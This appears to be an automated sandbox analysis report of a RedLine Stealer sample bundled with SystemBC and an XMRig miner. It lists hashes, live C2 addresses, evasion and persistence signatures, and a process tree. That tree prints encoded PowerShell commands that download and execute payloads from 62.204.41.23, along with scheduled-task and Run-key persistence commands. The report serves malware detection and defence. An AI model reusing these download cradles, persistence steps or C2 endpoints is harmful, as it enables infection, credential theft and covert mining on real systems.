Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
04-05-2023 11:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
95KB
-
MD5
92e79e8ed958f7289702c96fe03de5a5
-
SHA1
e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
-
SHA256
d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
-
SHA512
fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
-
SSDEEP
1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh
Malware Config
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Extracted
systembc
185.161.248.16:4440
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 1580 created 3080 1580 OneDrive.exe 59 PID 1580 created 3080 1580 OneDrive.exe 59 PID 1580 created 3080 1580 OneDrive.exe 59 PID 1640 created 3080 1640 OneDrive.exe 59 PID 1640 created 3080 1640 OneDrive.exe 59 PID 1640 created 3080 1640 OneDrive.exe 59 PID 1640 created 3080 1640 OneDrive.exe 59 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/1640-281-0x00007FF6DED00000-0x00007FF6DF6CA000-memory.dmp xmrig behavioral2/memory/4512-308-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-313-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-317-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-322-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-327-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-331-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-335-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-339-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-343-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-351-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-355-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig behavioral2/memory/4512-360-0x00007FF794550000-0x00007FF794D3F000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 6 3424 powershell.exe 7 2052 powershell.exe 8 2096 powershell.exe 35 3424 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation lsass.exe -
Executes dropped EXE 5 IoCs
pid Process 1580 OneDrive.exe 4868 dllhost.exe 1640 OneDrive.exe 2488 lsass.exe 792 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Wine dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Run dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" dllhost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 4868 dllhost.exe 2488 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe 792 lsass.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2052 set thread context of 2916 2052 powershell.exe 92 PID 2096 set thread context of 1716 2096 powershell.exe 93 PID 1640 set thread context of 4968 1640 OneDrive.exe 124 PID 1640 set thread context of 4512 1640 OneDrive.exe 125 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3740 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1852 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 792 lsass.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 3424 powershell.exe 2096 powershell.exe 1332 powershell.exe 2052 powershell.exe 1332 powershell.exe 2096 powershell.exe 2052 powershell.exe 3424 powershell.exe 2052 powershell.exe 2052 powershell.exe 1580 OneDrive.exe 1580 OneDrive.exe 1580 OneDrive.exe 1580 OneDrive.exe 1768 powershell.exe 1768 powershell.exe 1768 powershell.exe 1716 RegSvcs.exe 4868 dllhost.exe 4868 dllhost.exe 1580 OneDrive.exe 1580 OneDrive.exe 1640 OneDrive.exe 1640 OneDrive.exe 1640 OneDrive.exe 1640 OneDrive.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1716 RegSvcs.exe 1716 RegSvcs.exe 1640 OneDrive.exe 1640 OneDrive.exe 1640 OneDrive.exe 1640 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 2916 RegSvcs.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeShutdownPrivilege 2688 powercfg.exe Token: SeCreatePagefilePrivilege 2688 powercfg.exe Token: SeShutdownPrivilege 4940 powercfg.exe Token: SeCreatePagefilePrivilege 4940 powercfg.exe Token: SeShutdownPrivilege 3600 powercfg.exe Token: SeCreatePagefilePrivilege 3600 powercfg.exe Token: SeShutdownPrivilege 3696 powercfg.exe Token: SeCreatePagefilePrivilege 3696 powercfg.exe Token: SeDebugPrivilege 1716 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 1768 powershell.exe Token: SeSecurityPrivilege 1768 powershell.exe Token: SeTakeOwnershipPrivilege 1768 powershell.exe Token: SeLoadDriverPrivilege 1768 powershell.exe Token: SeSystemProfilePrivilege 1768 powershell.exe Token: SeSystemtimePrivilege 1768 powershell.exe Token: SeProfSingleProcessPrivilege 1768 powershell.exe Token: SeIncBasePriorityPrivilege 1768 powershell.exe Token: SeCreatePagefilePrivilege 1768 powershell.exe Token: SeBackupPrivilege 1768 powershell.exe Token: SeRestorePrivilege 1768 powershell.exe Token: SeShutdownPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeSystemEnvironmentPrivilege 1768 powershell.exe Token: SeRemoteShutdownPrivilege 1768 powershell.exe Token: SeUndockPrivilege 1768 powershell.exe Token: SeManageVolumePrivilege 1768 powershell.exe Token: 33 1768 powershell.exe Token: 34 1768 powershell.exe Token: 35 1768 powershell.exe Token: 36 1768 powershell.exe Token: SeIncreaseQuotaPrivilege 1768 powershell.exe Token: SeSecurityPrivilege 1768 powershell.exe Token: SeTakeOwnershipPrivilege 1768 powershell.exe Token: SeLoadDriverPrivilege 1768 powershell.exe Token: SeSystemProfilePrivilege 1768 powershell.exe Token: SeSystemtimePrivilege 1768 powershell.exe Token: SeProfSingleProcessPrivilege 1768 powershell.exe Token: SeIncBasePriorityPrivilege 1768 powershell.exe Token: SeCreatePagefilePrivilege 1768 powershell.exe Token: SeBackupPrivilege 1768 powershell.exe Token: SeRestorePrivilege 1768 powershell.exe Token: SeShutdownPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeSystemEnvironmentPrivilege 1768 powershell.exe Token: SeRemoteShutdownPrivilege 1768 powershell.exe Token: SeUndockPrivilege 1768 powershell.exe Token: SeManageVolumePrivilege 1768 powershell.exe Token: 33 1768 powershell.exe Token: 34 1768 powershell.exe Token: 35 1768 powershell.exe Token: 36 1768 powershell.exe Token: SeIncreaseQuotaPrivilege 1768 powershell.exe Token: SeSecurityPrivilege 1768 powershell.exe Token: SeTakeOwnershipPrivilege 1768 powershell.exe Token: SeLoadDriverPrivilege 1768 powershell.exe Token: SeSystemProfilePrivilege 1768 powershell.exe Token: SeSystemtimePrivilege 1768 powershell.exe Token: SeProfSingleProcessPrivilege 1768 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2488 lsass.exe 792 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2232 wrote to memory of 1332 2232 file.exe 83 PID 2232 wrote to memory of 1332 2232 file.exe 83 PID 2232 wrote to memory of 2052 2232 file.exe 86 PID 2232 wrote to memory of 2052 2232 file.exe 86 PID 2232 wrote to memory of 3424 2232 file.exe 85 PID 2232 wrote to memory of 3424 2232 file.exe 85 PID 2232 wrote to memory of 2096 2232 file.exe 84 PID 2232 wrote to memory of 2096 2232 file.exe 84 PID 2052 wrote to memory of 5024 2052 powershell.exe 91 PID 2052 wrote to memory of 5024 2052 powershell.exe 91 PID 2052 wrote to memory of 5024 2052 powershell.exe 91 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2052 wrote to memory of 2916 2052 powershell.exe 92 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 2096 wrote to memory of 1716 2096 powershell.exe 93 PID 3424 wrote to memory of 1580 3424 powershell.exe 99 PID 3424 wrote to memory of 1580 3424 powershell.exe 99 PID 4568 wrote to memory of 2688 4568 cmd.exe 105 PID 4568 wrote to memory of 2688 4568 cmd.exe 105 PID 4568 wrote to memory of 4940 4568 cmd.exe 106 PID 4568 wrote to memory of 4940 4568 cmd.exe 106 PID 4568 wrote to memory of 3600 4568 cmd.exe 107 PID 4568 wrote to memory of 3600 4568 cmd.exe 107 PID 4568 wrote to memory of 3696 4568 cmd.exe 108 PID 4568 wrote to memory of 3696 4568 cmd.exe 108 PID 3424 wrote to memory of 4868 3424 powershell.exe 109 PID 3424 wrote to memory of 4868 3424 powershell.exe 109 PID 3424 wrote to memory of 4868 3424 powershell.exe 109 PID 3424 wrote to memory of 2488 3424 powershell.exe 113 PID 3424 wrote to memory of 2488 3424 powershell.exe 113 PID 3424 wrote to memory of 2488 3424 powershell.exe 113 PID 2448 wrote to memory of 3844 2448 cmd.exe 116 PID 2448 wrote to memory of 3844 2448 cmd.exe 116 PID 2448 wrote to memory of 1344 2448 cmd.exe 117 PID 2448 wrote to memory of 1344 2448 cmd.exe 117 PID 2448 wrote to memory of 4072 2448 cmd.exe 118 PID 2448 wrote to memory of 4072 2448 cmd.exe 118 PID 2448 wrote to memory of 1628 2448 cmd.exe 120 PID 2448 wrote to memory of 1628 2448 cmd.exe 120 PID 2488 wrote to memory of 3740 2488 lsass.exe 122 PID 2488 wrote to memory of 3740 2488 lsass.exe 122 PID 2488 wrote to memory of 3740 2488 lsass.exe 122 PID 1640 wrote to memory of 4968 1640 OneDrive.exe 124 PID 1640 wrote to memory of 4512 1640 OneDrive.exe 125 PID 2488 wrote to memory of 792 2488 lsass.exe 126 PID 2488 wrote to memory of 792 2488 lsass.exe 126 PID 2488 wrote to memory of 792 2488 lsass.exe 126 PID 2488 wrote to memory of 4936 2488 lsass.exe 127 PID 2488 wrote to memory of 4936 2488 lsass.exe 127 PID 2488 wrote to memory of 4936 2488 lsass.exe 127 PID 4936 wrote to memory of 1852 4936 cmd.exe 129 PID 4936 wrote to memory of 1852 4936 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1580
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4868
-
-
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:11 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:3740
-
-
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE8BF.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:1852
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:5024
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:324
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3844
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1344
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4072
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1628
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4968
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4512
-
-
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1640
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
410B
MD524cfd42a8de70b38ed70e1f8cf4eda1c
SHA1e447168fd38da9175084b36a06c3e9bbde99064c
SHA25693b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA5125c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
1KB
MD55fe0ce98e33b4a45e2a796ef1be2d16c
SHA11034ce2655e8cc47127e6c3f1bd7495fb5906cdd
SHA256984ad046f9526683451b296135ef4e10679359043e8513a3d7c035b0ade4686e
SHA512d7a4fcf2563b8be2b95b839ba41d5980936176c15f9b99cbe5bc7e1be5692cb45317c1a035bc153800f02003f588b0205ffcb671e1a7c59fca178f5a549f0783
-
Filesize
1KB
MD55fe0ce98e33b4a45e2a796ef1be2d16c
SHA11034ce2655e8cc47127e6c3f1bd7495fb5906cdd
SHA256984ad046f9526683451b296135ef4e10679359043e8513a3d7c035b0ade4686e
SHA512d7a4fcf2563b8be2b95b839ba41d5980936176c15f9b99cbe5bc7e1be5692cb45317c1a035bc153800f02003f588b0205ffcb671e1a7c59fca178f5a549f0783
-
Filesize
1KB
MD56e00566cbe9c2e0b425a27426c8991df
SHA10731f6903578a613e0b290d43c28c7227f0c42a7
SHA25686c10a8c85f9f2153b819d465b0778dad605991a5f2ac025b5820afbbbc8e6f4
SHA5120c719f2fab89b01841b4a0bf627ce97b2662a398831264501aad6dd9b4480a556034f832b0d01d84bb61db13671038e17eececc596d80182e9e71d2960144aef
-
Filesize
1KB
MD5a4527e94f1149f01ddbd257b0651c9f8
SHA1dd7f13bbaccb203fe3648b84d74e65a2e249753f
SHA256078f7bc7b966e97681f655b8b8fcfff2b0c1bdfd1b8c0663ebf6bac65c857031
SHA512582bf61a10489d4aaece8f007b5cf74364c5e34465aa0904a0edcd5b27ff2f2443f957237f71203ffeaa99e0a82e6a25eeff57d6c9b2fa106a75b9fc9dbd8b54
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
154B
MD58cf9d6ca500eda5e5e57733e5bf7ca94
SHA187b19630162891c8b04c0517a467cf13dfbefd34
SHA256eed54667722b45ef9de7e884c76636040b8b768148ab6348bb816fb2825787f8
SHA512cb04a612005c13a414dd093bcf9897856230bcc267cdbc0ebb01a6ffc55474e4b1af3078038b454b971ae708e1b6fdab069040bdb67a48a2b577115d9c6574c6
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
